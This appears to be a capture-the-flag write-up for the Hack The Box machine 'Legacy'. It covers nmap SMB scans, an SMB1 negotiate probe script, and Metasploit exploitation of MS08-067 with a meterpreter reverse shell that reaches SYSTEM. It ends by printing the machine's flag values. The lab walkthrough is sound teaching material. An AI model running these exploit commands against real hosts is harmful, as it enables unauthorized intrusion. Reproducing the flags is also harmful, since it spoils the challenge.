
Legacy

Legacy is an easy Windows XP SP3 machine whose only exposed services are the Windows RPC, NetBIOS and SMB trio on ports 135, 139 and 445. The SMB service is vulnerable to two separate remote code execution bugs at once: MS08-067 (CVE-2008-4250) and MS17-010 (CVE-2017-0143). The attack uses MS08-067, a stack buffer overflow in the Server service's path canonicalization code that is triggered by a crafted RPC request sent over SMB. Because the Server service runs as NT AUTHORITY\SYSTEM, the payload lands a SYSTEM shell with no post-exploitation steps required.

Tags: MS08-067, Windows XP

Machine: Legacy
Difficulty: Easy
OS: Windows
Released on: 15th March, 2017
Created by: ch4p

Attack Chain

Nmap → Port 445 open (Windows XP SP3)
  → smb-vuln scripts confirm MS08-067 + MS17-010
    → MSF ms08_067_netapi
      → Stack overflow via crafted RPC/SMB path
        → NT AUTHORITY\SYSTEM shell
          → user.txt (Documents and Settings\john\Desktop)
          → root.txt (Documents and Settings\Administrator\Desktop)

Reconnaissance

Full TCP port scan (all 65535 ports, with service/version detection and default scripts). Only three ports are open, all of them Windows RPC/NetBIOS/SMB:

Nmap scan report for 10.129.227.181
Host is up, received echo-reply ttl 127 (0.16s latency).
Scanned at 2026-06-12 14:05:18 EAT for 978s
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE      REASON          VERSION
135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 127 Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: a2:de:ad:ef:a6:51 (unknown)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   a2 de ad ef a6 51 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 16915/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 14160/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 60321/udp): CLEAN (Failed to receive data)
|   Check 4 (port 27086/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2026-06-17T16:19:07+03:00
|_clock-skew: mean: 5d00h27m40s, deviation: 2h07m16s, median: 4d22h57m40s

NSE: Script Post-scanning.

Windows XP with port 445 open is an immediate red flag: the host only negotiates SMBv1 (the smb2 scripts above fail to negotiate) and message signing is disabled. Run the SMB vulnerability scripts against that port; two critical CVEs are identified:

➜  nmap -p 445 --script vuln 10.129.227.181 -vv

Nmap scan report for 10.129.227.181
Host is up, received echo-reply ttl 127 (0.16s latency).
Scanned at 2026-06-12 14:19:54 EAT for 15s

PORT    STATE SERVICE      REASON
445/tcp open  microsoft-ds syn-ack ttl 127

Host script results:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false

Windows XP left support in April 2014, so this machine is more than a decade past end-of-life and still exposes both of its headline SMB bugs, MS08-067 and MS17-010. I used MS08-067 because it is the historically appropriate exploit for XP SP3 and the Metasploit module has a non-intrusive check and automatic target fingerprinting; the stock ms17_010_eternalblue module does not target XP, so MS17-010 on this host would need a different module. Either way the outcome is the same: any unauthenticated client that can reach port 445 gets SYSTEM.
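The two host-script results in the first scan (smb-security-mode reporting signing disabled, and smb2-security-mode failing to negotiate) come from a single SMB1 Negotiate exchange, and the same check can be reproduced without nmap. The following is an added example, not code from the original post: it builds an SMB_COM_NEGOTIATE request that offers the SMB 2.002 dialect alongside the SMB1 dialects, so an SMB2-capable server answers with an SMB2 header while an SMBv1-only host like Legacy answers with an SMB1 header and a dialect index, and it decodes the SecurityMode byte to report the same user-level/challenge-response/signing facts nmap prints. Only the wire format is from the protocol; the dialect list and its order, the constructed sample responses and the `probe` helper are assumptions for illustration.

```python
"""SMB1 negotiate probe: does a host answer with SMBv1, and is signing enforced?

Added example for this writeup, not code from the original post.  Only the
SMB wire format is from the protocol; the dialect list, the constructed sample
responses and the probe() helper are assumptions for illustration.
"""
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72

# Offered dialects.  Listing "SMB 2.002" is what makes an SMB2-capable server
# reply with an SMB2 header; a server that only speaks SMBv1 (Windows XP)
# ignores it and picks one of the SMB1 dialects by index.  (Order is an assumption.)
DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"NT LM 0.12", b"SMB 2.002"]

# Little-endian SMB1 header: magic, command, NT status, flags, flags2,
# PID high, signature, reserved, TID, PID, UID, MID  (32 bytes total).
SMB1_HEADER = "<4sBIBHHQHHHHH"


def build_negotiate_request():
    """SMB_COM_NEGOTIATE request wrapped in a 4-byte NetBIOS session header."""
    header = struct.pack(SMB1_HEADER, SMB1_MAGIC, SMB_COM_NEGOTIATE, 0,
                         0x18,    # Flags: canonical paths, case-insensitive
                         0xC853,  # Flags2: unicode, NT status, extended security
                         0, 0, 0, 0, 0xFEFF, 0, 1)
    dialect_data = b"".join(b"\x02" + d + b"\x00" for d in DIALECTS)
    body = struct.pack("<BH", 0, len(dialect_data)) + dialect_data  # WordCount, ByteCount
    smb = header + body
    return struct.pack(">I", len(smb)) + smb  # NetBIOS: type 0x00 + 3-byte length


def parse_negotiate_response(data):
    """Decode a negotiate response into the facts nmap's smb scripts report."""
    if len(data) < 8:
        raise ValueError("short response")
    length = struct.unpack(">I", data[:4])[0] & 0x00FFFFFF
    smb = data[4:4 + length]
    if smb[:4] == SMB2_MAGIC:
        return {"protocol": "SMB2+", "dialect": None}
    if smb[:4] != SMB1_MAGIC or len(smb) < 36:
        raise ValueError("not an SMB negotiate response")
    status = struct.unpack("<I", smb[5:9])[0]
    if status != 0:
        raise ValueError("negotiate failed, NT status 0x%08x" % status)
    word_count = smb[32]
    if word_count != 17:  # only the NT LM 0.12 response layout is decoded here
        raise ValueError("unexpected WordCount %d" % word_count)
    dialect_index, security_mode = struct.unpack("<HB", smb[33:36])
    if dialect_index == 0xFFFF:
        raise ValueError("server rejected every offered dialect")
    return {
        "protocol": "SMB1",
        "dialect": DIALECTS[dialect_index].decode(),
        "user_level_security": bool(security_mode & 0x01),
        "challenge_response": bool(security_mode & 0x02),
        "signing_enabled": bool(security_mode & 0x04),
        "signing_required": bool(security_mode & 0x08),
    }


def probe(host, port=445, timeout=5.0):
    """Send one negotiate request to a live host and decode the answer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_negotiate_request())
        return parse_negotiate_response(sock.recv(4096))


def sample_xp_response():
    """Constructed response shaped like an XP SP3 answer: DialectIndex 2 (NT LM 0.12),
    SecurityMode 0x03 (user-level, challenge/response, signing off), UTC+3 timezone."""
    header = struct.pack(SMB1_HEADER, SMB1_MAGIC, SMB_COM_NEGOTIATE, 0,
                         0x98, 0xC803, 0, 0, 0, 0, 0xFEFF, 0, 1)
    # DialectIndex, SecurityMode, MaxMpx, MaxVCs, MaxBuffer, MaxRaw, SessionKey,
    # Capabilities, SystemTime, ServerTimeZone (minutes west of UTC), ChallengeLength
    params = struct.pack("<HBHHIIIIQhB", 2, 0x03, 50, 1, 16644, 65536, 0,
                         0x0000E3FD, 0, -180, 8)
    body = struct.pack("<B", 17) + params + struct.pack("<H", 8) + b"\x00" * 8
    smb = header + body
    return struct.pack(">I", len(smb)) + smb


def sample_smb2_response():
    """Constructed: just enough of an SMB2 header to show the protocol switch."""
    smb = SMB2_MAGIC + b"\x00" * 60
    return struct.pack(">I", len(smb)) + smb


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))        # e.g. python3 smbprobe.py 10.129.227.181
    else:
        print(parse_negotiate_response(sample_xp_response()))
```

Run it with a target address to probe a live host, or with no arguments to decode the constructed XP-style sample. An SMB1 answer to a request that offered SMB 2.002 means the server did not pick SMB2, which on a modern host can also mean SMB2 was deliberately disabled, so treat it as "SMBv1 is negotiable", not as proof that nothing newer exists. Signing not being required is what lets an attacker relay or tamper with SMB sessions, which is why nmap flags it even though it is the XP default.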

Exploitation - MS08-067 NetAPI

Search for the module and load it:

➜  msfconsole -q
msf > search CVE-2008-4250

Matching Modules
================

   #   Name                                                             Disclosure Date  Rank   Check  Description
   -   ----                                                             ---------------  ----   -----  -----------
   0   exploit/windows/smb/ms08_067_netapi                              2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

			//// REDACTED ////

msf > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.118    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting



View the full module info with the info, or info -d command.

Configure, verify and run the exploit. setg makes RHOSTS and LHOST global so they carry over to any later module, and check confirms the target is vulnerable before anything is fired:

msf exploit(windows/smb/ms08_067_netapi) > setg RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf exploit(windows/smb/ms08_067_netapi) > setg LHOST tun0
LHOST => tun0
msf exploit(windows/smb/ms08_067_netapi) > check
[+] 10.129.227.181:445 - The target is vulnerable.
msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.15.192:4444
[*] 10.129.227.181:445 - Automatically detecting the target...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.26/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (199238 bytes) to 10.129.227.181
[*] Meterpreter session 1 opened (10.10.15.192:4444 -> 10.129.227.181:1040) at 2026-06-12 14:28:20 +0300

meterpreter > 

The module fingerprints the target over SMB and selects the matching exploit variant (here Windows XP SP3 English with NX). That matters because MS08-067 relies on per-build return addresses, and a wrong target choice crashes the Server service instead of returning a shell. The bug itself (CVE-2008-4250) is a stack buffer overflow in the path canonicalization routine in netapi32.dll, reached through the Server service's NetprPathCanonicalize RPC call over the BROWSER or SRVSVC named pipe: a path containing crafted "..\" sequences makes the canonicalization code write past the stack buffer, and the module uses that corruption to redirect execution into the payload.

Confirm access:

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

I landed directly as SYSTEM: the Server service runs as NT AUTHORITY\SYSTEM, so the payload inherits that context and no privilege escalation is required.

Grab the flags. Note that Windows XP stores user profiles under Documents and Settings rather than Users:

meterpreter > pwd
C:\
meterpreter > ls
Listing: C:\
============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100777/rwxrwxrwx  0       fil   2017-03-16 08:30:44 +0300  AUTOEXEC.BAT
100666/rw-rw-rw-  0       fil   2017-03-16 08:30:44 +0300  CONFIG.SYS
040777/rwxrwxrwx  0       dir   2017-03-16 09:07:20 +0300  Documents and Settings
100444/r--r--r--  0       fil   2017-03-16 08:30:44 +0300  IO.SYS
100444/r--r--r--  0       fil   2017-03-16 08:30:44 +0300  MSDOS.SYS
100555/r-xr-xr-x  47564   fil   2008-04-13 23:13:04 +0300  NTDETECT.COM
040555/r-xr-xr-x  0       dir   2017-12-29 23:41:18 +0300  Program Files
040777/rwxrwxrwx  0       dir   2017-03-16 08:32:59 +0300  System Volume Information
040777/rwxrwxrwx  0       dir   2022-05-18 15:10:06 +0300  WINDOWS
100666/rw-rw-rw-  211     fil   2017-03-16 08:26:58 +0300  boot.ini
100444/r--r--r--  250048  fil   2008-04-14 01:01:44 +0300  ntldr
000000/---------  0       fif   1970-01-01 03:00:00 +0300  pagefile.sys

meterpreter > cd Documents\ and\ Settings\\
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2017-03-16 09:07:21 +0300  Administrator
040777/rwxrwxrwx  0     dir   2017-03-16 08:29:48 +0300  All Users
040777/rwxrwxrwx  0     dir   2017-03-16 08:33:37 +0300  Default User
040777/rwxrwxrwx  0     dir   2017-03-16 08:32:52 +0300  LocalService
040777/rwxrwxrwx  0     dir   2017-03-16 08:32:43 +0300  NetworkService
040777/rwxrwxrwx  0     dir   2017-03-16 08:33:42 +0300  john

meterpreter > ls john\\Desktop\\
Listing: john\Desktop\
======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 09:19:49 +0300  user.txt

meterpreter > cat john\\Desktop\\user.txt
e69af0e4f443de7e36876fda4ec7644fmeterpreter >
meterpreter > ls Administrator\\Desktop\\
Listing: Administrator\Desktop\
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 09:18:50 +0300  root.txt

meterpreter > cat  Administrator\\Desktop\\root.txt
993442d258b0e0ec917cae9e695d5713meterpreter >

This post is licensed under CC BY 4.0 by the author.